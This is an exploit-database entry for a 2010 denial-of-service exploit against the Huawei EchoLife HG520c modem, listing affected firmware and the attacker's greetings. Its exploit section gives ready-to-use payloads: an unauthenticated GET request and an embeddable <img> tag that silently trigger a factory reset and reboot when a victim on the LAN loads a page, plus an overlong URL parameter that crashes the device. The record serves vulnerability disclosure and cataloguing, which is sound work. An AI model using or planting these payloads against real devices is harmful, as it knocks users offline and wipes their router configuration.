ID
VAR-E-201004-1036
EDB ID
12297
TITLE
Huawei EchoLife HG520c - Modem Reset (Denial of Service) - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Huawei EchoLife HG520c - Modem Reset (Denial of Service). CVE-63991 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | huawei | model: | echolife hg520c | scope: | - | version: | - | Trust: 1.0 |
EXPLOIT
# Exploit Title: Huawei EchoLife HG520c Denial of Service and Modem Reset
# Date: 2010-04-19
# Author: hkm
# Product Link: http://www.huawei.com/mobileweb/en/products/view.do?id=660
# Firmware Versions: 3.10.18.7-1.0.7.0
# 3.10.18.5-1.0.7.0
# 3.10.18.4
# Software Versions: V100R001B120Telmex
# V100R001B121Telmex
[Description #1]
=================
The page '/AutoRestart.html' restores the default configuration and reboots
the device. This page does not require authentication.
[Exploit #1]
=================
From LAN or Client Side, just send a simple GET request to:
http://192.168.1.254/AutoRestart.html
<img src=http://192.168.1.254/AutoRestart.html>
In case of having the remote interface enabled, from remote:
http://<REMOTE IP>/AutoRestart.html
______________________________________________________________________
[Description #2]
=================
The page '/rpLocalDeviceJump.html' reboots the device when the 'index'
variable value has a length of more than 7 characters. Requires
authentication.
[Exploit #2]
=================
http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS
_____________________________________________________________________
Greets: Requiz, LightOS, chr1x, sdc, nitr0us, pcp, Xianur0, Chito, Kike,
House, Aldo, Chewi, Alex, Paco.
hkm
hkm@hakim.ws
[ Comunidad Underground de Mexico - http://www.underground.org.mx ]
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Modem Reset (Denial of Service)
Trust: 1.0
CREDITS
hkm
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 12297 | Trust: 1.6 |
db: | EDBNET | id: | 35853 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/12297/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 12297 |
db: | EDBNET | id: | 35853 |
LAST UPDATE DATE
2022-07-27T09:48:03.185000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 12297 | date: | 2010-04-19T00:00:00 |
db: | EDBNET | id: | 35853 | date: | 2010-04-19T00:00:00 |